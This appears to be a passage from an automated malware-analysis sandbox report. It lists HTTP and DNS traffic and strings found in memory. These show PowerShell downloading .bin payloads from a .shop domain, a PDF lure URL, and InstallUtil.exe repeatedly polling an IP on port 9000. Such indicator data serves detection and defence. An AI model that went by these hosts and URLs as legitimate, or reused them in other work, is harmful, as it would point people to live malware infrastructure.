Source: global traffic	HTTP traffic detected: GET /pdf/cloudviewer/ref095vq842r70/3rd/party/authorisation/form/20241210/docs/w3/ref095vq842r70_3rd_party_authorisation_form.pdf HTTP/1.1Host: csp-invoices-v5.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/7552973650/u.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cndef1.green-pathways.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/7552973650/nnn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cndef1.green-pathways.shop
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000

Source: global traffic	DNS traffic detected: DNS query: static.klipxuhaq.shop
Source: global traffic	DNS traffic detected: DNS query: csp-invoices-v5.com
Source: global traffic	DNS traffic detected: DNS query: cndef1.green-pathways.shop
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org

Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.75:9000
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002910000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.75:9000/wbinjget?q=0CAE766850B2702DDB609BB03263B071
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DF44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cndef1.green-pathways.shop
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsP
Source: svchost.exe, 00000008.00000002.3047102388.000001D929411000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000009.00000002.1452751540.0000028DD674B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://csp-invoices-v5.com
Source: svchost.exe, 00000008.00000003.1396373449.000001D9292F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: InstallUtil.exe, 00000019.00000002.1839357816.000000000109C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000009.00000002.1552097553.0000028DE6458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD67F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1552097553.0000028DE6315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: powershell.exe, 0000000B.00000002.1610462862.000002002DCE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002DCDD000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666482707.0000000004EC9000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1665694784.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DEF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1830852704.00000000049B4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846119127.0000000004A9F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831297569.0000000004B79000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908128223.0000000004989000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: InstallUtil.exe, 00000015.00000002.3844536483.00000000078D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oena
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
